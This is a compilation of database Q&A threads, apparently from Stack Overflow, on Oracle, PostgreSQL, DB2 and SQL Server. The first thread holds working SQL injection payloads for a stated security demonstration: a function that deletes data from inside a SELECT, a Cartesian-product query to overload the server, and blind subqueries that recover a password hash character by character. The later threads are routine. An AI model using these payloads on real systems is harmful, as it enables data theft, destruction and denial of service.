I want to demonstrate the insecurity of some web services that we have. They send unsanitized user input into SELECT statements against an Oracle database.
SQL injection on SELECT statements is possible (through the WHERE clause), but I am having a hard time demonstrating it because the same parameter gets placed in other queries as well during the same web service call.
E.g:
' or client_id = 999'--
will exploit the first query, but since the same WS request runs other SQL SELECTs, it will return an Oracle error on the next query because client_id is referred to by an alias in the second table.
I am looking for something more convincing than just an ORA error being returned, such as managing to drop a table in the process. However, I do not think this is possible from a SELECT statement.
Any ideas how I can cause some data to change, or perhaps get sensitive data included as part of an ORA error?
It's not very easy to change data, but it's still possible. A function created with PRAGMA AUTONOMOUS_TRANSACTION can contain DML and may be called in a WHERE clause. For instance:
CREATE OR REPLACE FUNCTION test_funct RETURN int
IS
  -- allows DML and COMMIT inside a function called from a query
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  DELETE FROM test_del;
  COMMIT;
  RETURN 0;
END;
-- and then
SELECT null from dual where test_funct()=1;
Another option is to try creating a huge subquery in the WHERE clause, which in turn may cause a serious performance problem on the server.
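A sketch of such a payload (ALL_OBJECTS is a large data dictionary view present in every Oracle database, so the unrestricted Cartesian product below is expensive to count):
' or 1 = (select count(*) from all_objects a, all_objects b, all_objects c)--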
You do not need a custom function; you can use a subquery:
" or client_id = (SELECT 999 FROM secret_table WHERE username = 'Admin' AND password_hash = '0123456789ABCD')"
If the query succeeds then you know that:
There is a table called secret_table that can be seen by the user executing this query (even if there is not a user interface that would typically be used to directly interact with that table);
That it has the columns username and password_hash;
That there is a user called Admin; and
That the Admin user has a password that hashes to 0123456789ABCD.
You can repeat this and map the structure of the entire database and check for any values in the database.
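For example, once a table and column are confirmed, values can be extracted one character at a time (a hedged sketch; SUBSTR is standard Oracle):
" or client_id = (SELECT 999 FROM secret_table WHERE username = 'Admin' AND SUBSTR(password_hash, 1, 1) = '0')"
If the query returns rows, the first character of the hash is '0'; iterate over positions and candidate characters to recover the full value.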
I want to know if I can create a PL/SQL procedure whose number of parameters and their types can change.
For example procedure p1.
I can use it like this
p1 (param1, param2,......., param n);
I want to pass a table name and data to the procedure, but the attributes change for every table:
create or replace PROCEDURE INSERTDATA(NOMT in varchar2) is
  num int;
BEGIN
  EXECUTE IMMEDIATE 'SELECT count(*) FROM user_tables WHERE table_name = :1'
    into num using NOMT;
  IF (num < 1) THEN
    dbms_output.put_line('table does not exist!');
  ELSE
    dbms_output.put_line('');
    -- here I want to insert the parameters into the table,
    -- but the table attributes are not the same!
  END IF;
END INSERTDATA;
As far as I can tell, no, you cannot. The number and datatypes of all parameters must be fixed.
You could pass a collection as a parameter (and have a different number of values within it), but that's still a single parameter. A quick sketch:
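(The type and procedure names here are made up for illustration.)
CREATE OR REPLACE TYPE t_values AS TABLE OF VARCHAR2(4000);
CREATE OR REPLACE PROCEDURE p1 (p_vals IN t_values) IS
BEGIN
  FOR i IN 1 .. p_vals.COUNT LOOP
    dbms_output.put_line(p_vals(i));
  END LOOP;
END;
-- any number of values, still one parameter:
-- BEGIN p1(t_values('a', 'b', 'c')); END;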
Where would you want to use such a procedure?
If you need to store, update and query a variable amount of information, might I recommend switching to JSON queries and objects in Oracle. Oracle has deep support for both fixed and dynamic querying of JSON data, in both SQL and PL/SQL.
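A hedged sketch of that approach (Oracle 12c or later; the table T and its columns NAME and QTY are made-up examples): the caller passes one JSON document instead of a variable parameter list.
CREATE OR REPLACE PROCEDURE insert_from_json (p_doc IN CLOB) IS
BEGIN
  -- JSON_TABLE projects the document into relational columns
  INSERT INTO t (name, qty)
  SELECT jt.name, jt.qty
  FROM   json_table(p_doc, '$'
           COLUMNS (name VARCHAR2(100) PATH '$.name',
                    qty  NUMBER        PATH '$.qty')) jt;
END;
-- call: BEGIN insert_from_json('{"name":"widget","qty":3}'); END;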
I want to pass a table name and data to the procedure, but the attributes change for every table
The problem with such a universal procedure is that something needs to know the structure of the target table. Your approach demands that the caller discover the projection of the table and arrange the parameters correctly.
In no particular order:
This is bad practice because it requires the calling program to do the hard work regarding the data dictionary.
Furthermore, it breaks the Law of Demeter because the calling program needs to understand things like primary keys (sequences, identity columns, etc.), foreign key lookups, and so on
This approach mandates that all columns must be populated; it makes no allowance for virtual columns, optional columns, etc
To work, the procedure would have to use dynamic SQL, which is always hard work because it turns compilation errors into runtime errors, and should be avoided if at all possible.
It is trivially simple to generate a dedicated insert procedure for each table in a schema, using dynamic SQL against the data dictionary. This is the concept of the Table API. It's not without its own issues but it is much safer than what your question proposes.
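For illustration, a rough sketch of such a generator (the naming convention and simplifying assumptions are mine: every column is a simple scalar, names stay within identifier limits, and there is no error handling):
DECLARE
  v_sql VARCHAR2(32767);
BEGIN
  FOR t IN (SELECT table_name FROM user_tables) LOOP
    -- build one dedicated insert procedure per table from the data dictionary
    SELECT 'CREATE OR REPLACE PROCEDURE ins_' || t.table_name
        || ' (' || listagg('p_' || column_name || ' IN '
                           || t.table_name || '.' || column_name || '%TYPE', ', ')
                   WITHIN GROUP (ORDER BY column_id)
        || ') IS BEGIN INSERT INTO ' || t.table_name
        || ' (' || listagg(column_name, ', ') WITHIN GROUP (ORDER BY column_id)
        || ') VALUES (' || listagg('p_' || column_name, ', ')
                   WITHIN GROUP (ORDER BY column_id)
        || '); END;'
      INTO v_sql
      FROM user_tab_columns
     WHERE table_name = t.table_name;
    EXECUTE IMMEDIATE v_sql;
  END LOOP;
END;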
I have a role in postgres as follows:
create role admin login password 'some_password';
What I'd like instead is:
create role admin login (select current_setting('custom.ADMIN_PASSWORD'));
But this fails with the error:
ERROR: syntax error at or near "("
LINE 2: (SELECT ...
I expected this to work, because it works in the following example:
select public.register_account(
email := (SELECT current_setting('custom.SOME_EMAIL')),
password := (SELECT current_setting('custom.SOME_PASSWORD'))
);
How can I use current_setting() to apply a role password?
Bonus Points: Why does my first example fail, while my second succeeds?
The first example failed because DDL statements like that aren't your general everyday SQL. Think of a statement like the creation of a role as being special within the context of PostgreSQL. In general, the database engine prefers DDL and other structural changes to be explicit, not calculated on the fly like much of the rest of SQL.
You can, however, get around this restriction by using a DO block, essentially an inline function. Combined with the EXECUTE command and the format() function, you can go dynamic to your heart's content.
Just be warned that with great power comes great responsibility. Dynamic SQL like this should be avoided unless you truly have no alternative, since it short-circuits a lot of the grammar/parser validation. Simple mistakes become much harder to see and fix, and at the same time, because this is a structural change to the database rather than just another row of data, far more serious in effect when bugs arise. Many statements like CREATE ROLE do not allow dynamic parameters by default precisely for this reason.
All that said, this will get you going.
DO $$
BEGIN
  -- format() with %L quotes the value as a SQL literal, so passwords
  -- containing quotes are handled safely
  EXECUTE format('CREATE ROLE admin LOGIN PASSWORD %L',
                 current_setting('custom.ADMIN_PASSWORD'));
END;
$$ LANGUAGE plpgsql;
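For this to work, the setting has to exist in the session first; custom (dotted) settings can be supplied like this (placeholder value):
SET custom.ADMIN_PASSWORD = 's3cret';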
I'm getting an error while trying to create 2 tables in Green Screen STRSQL.
CREATE TABLE QTEMP/CUSTOMER AS (SELECT * FROM CBHHUBFP/SSCUSTP)
CREATE TABLE QTEMP/ADDRESS AS (SELECT * FROM QTEMP/CUSTOMER)
ERROR: Keyword CREATE not expected
Valid Tokens: End-Of-Statement
Am I missing something here?
Using STRSQL you can only execute one SQL statement at a time.
Regarding my comment on the accepted answer by @dcieslak: the following is an example of a Dynamic Compound Statement (DCS) with syntax that should be valid for use with the *SYS naming option, on any system [level of DB2 for IBM i] since the availability of the DCS feature. Notice the addition of the WITH DATA clause to make the statement syntactically correct, and the enclosing of the two semicolon-separated CREATE TABLE requests inside the BEGIN and END:
begin
CREATE TABLE QTEMP/CUSTOMER AS (SELECT * FROM qiws/qcustcdt )
with data
;
CREATE TABLE QTEMP/ADDRESS AS (SELECT * FROM QTEMP/CUSTOMER)
with data
;
end
-- Table ADDRESS created in QTEMP. /* <-- feedback of final rqs */
While that is possible to enter as a single request, there is likely no point in coding it that way, given the extra overhead; perhaps if it were run under isolation, doing more work, and coding exception handling, there would be value. In other words, the Start Interactive SQL Session (STRSQL) scripting environment already allows the isolation and the user decisions to react to exceptions when the statements are entered individually, successively, pressing Enter after each.
So unless the idea is to test what might be written in a routine [as a compound statement, i.e. statements between BEGIN-END pairs] without actually coding the CREATE PROCEDURE [or CREATE FUNCTION, or perhaps CREATE TRIGGER] with a routine-body, the implicitly created routine [as procedure] that is then run and deleted to implement the DCS is probably just a bunch of extra, unnecessary work.
Question: Is there any way to detect if an SQL statement is syntactically correct?
Explanation:
I have a very complex application which, at some point, needs very specific (and different) processing for different cases.
The solution was to have a table where there is a record for each condition, and an SQL command that is to be executed.
That table is not accessible to normal users, only to system admins who define those cases when a new special case occurs. So far, a new record was added directly to the table.
However, from time to time there were typos, and the SQL was malformed, causing issues.
What I want to accomplish is to create a UI for managing that module, where admins can type the SQL command and validate it before saving.
My idea was to simply run the statement inside a try/catch block and capture the result (the exception, if any), but I'm wondering if there is a more unobtrusive approach.
Any suggestion on this validation?
Thanks
P.S. I'm aware of the risk of SQL injection here, but that's not the case: the persons who have access to this are strictly controlled, and they are DBAs or developers, so the risk of SQL injection here is the same as the risk of having access to Enterprise Manager.
You can use SET PARSEONLY ON at the top of the query. Keep in mind that this only checks whether the query is syntactically correct; it will not catch things like misspelled tables, insufficient permissions, etc.
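A quick sketch (note that SET PARSEONLY takes effect at parse time, so turn it back off in a separate batch):
SET PARSEONLY ON;
SELECT * FROM;   -- reported as a syntax error; nothing in this batch executes
GO
SET PARSEONLY OFF;
GO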
Alternatively, you can wrap sys.dm_exec_describe_first_result_set in a stored procedure that takes the statement to check as a parameter:
CREATE PROC TestValid @stmt NVARCHAR(MAX)
AS
BEGIN
    IF EXISTS (
        SELECT 1 FROM sys.dm_exec_describe_first_result_set(@stmt, NULL, 0)
        WHERE error_message IS NOT NULL
          AND error_number IS NOT NULL
          AND error_severity IS NOT NULL
          AND error_state IS NOT NULL
          AND error_type IS NOT NULL
          AND error_type_desc IS NOT NULL )
    BEGIN
        SELECT error_message
        FROM sys.dm_exec_describe_first_result_set(@stmt, NULL, 0)
        WHERE column_ordinal = 0
    END
END
GO
This will return an error if one exists and nothing otherwise.
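A usage sketch (the statement is deliberately malformed, so the procedure returns the parser's error message):
EXEC TestValid N'SELECT FROM sys.objects WHERE';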
I have to execute a loop in the database. This is only a one-time requirement.
Right now, after executing the function, I drop it again.
Is there any good approach for creating temporary / disposable functions?
I needed a function to use many times in a script I was writing. It turns out you can create a temporary function using the pg_temp schema. This is a schema that is created on demand for your connection and is where temporary tables are stored; when your connection is closed or expires, this schema is dropped. If you create a function in this schema, the schema will be created automatically. Therefore,
create function pg_temp.testfunc() returns text as
$$ select 'hello'::text $$ language sql;
will be a function that will stick around as long as your connection sticks around. No need to call a drop command.
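Calling it works like any other function, as long as you schema-qualify the name:
select pg_temp.testfunc();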
A couple of additional notes on the smart trick in @crowmagnumb's answer:
The function must be schema-qualified at all times, even if pg_temp is in the search_path (as it is by default); according to Tom Lane, this is to prevent Trojan horses:
CREATE FUNCTION pg_temp.f_inc(int)
RETURNS int AS 'SELECT $1 + 1' LANGUAGE sql IMMUTABLE;
SELECT pg_temp.f_inc(42);
f_inc
-----
43
A function created in the temporary schema is only visible inside the same session (just like temp tables). It's invisible to all other sessions (even for the same role). You could access the function as a different role in the same session after SET ROLE.
You could even create a functional index based on this "temp" function:
CREATE INDEX foo_idx ON tbl (pg_temp.f_inc(id));
Thereby creating a plain index using a temporary function on a non-temp table. Such an index would be visible to all sessions but still only valid for the creating session. The query planner will not use a functional index where the expression is not repeated in the query itself. Still a bit of a dirty trick: the index will be dropped automatically when the session is closed, as a depending object. It feels like this should not be allowed at all ...
If you just need to execute a function repeatedly and all you need is SQL, consider a prepared statement instead. It acts much like a temporary SQL function that dies at the end of the session. Not the same thing, though, and can only be used by itself with EXECUTE, not nested inside another query. Example:
PREPARE upd_tbl AS
UPDATE tbl t SET set_name = $2 WHERE tbl_id = $1;
Call:
EXECUTE upd_tbl(123, 'foo_name');
Details:
Split given string and prepare case statement
If you are using version 9.0, you can do this with the new DO statement:
http://www.postgresql.org/docs/current/static/sql-do.html
With previous versions, you'll need to create the function, call it, and drop it again.
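A minimal sketch of a one-off loop in a DO block (nothing persists afterwards; the body runs in plpgsql by default):
DO $$
BEGIN
  FOR i IN 1..10 LOOP
    RAISE NOTICE 'iteration %', i;
  END LOOP;
END;
$$;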
For ad hoc procedures, cursors aren't too bad. They are too inefficient for production use, however.
They will let you easily loop over SQL results in the database.
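A sketch of such a loop (the table and column names are made up), iterating over query results inside a DO block:
DO $$
DECLARE
  r record;  -- implicit cursor row
BEGIN
  FOR r IN SELECT id, name FROM some_table LOOP
    RAISE NOTICE 'id = %, name = %', r.id, r.name;
  END LOOP;
END;
$$;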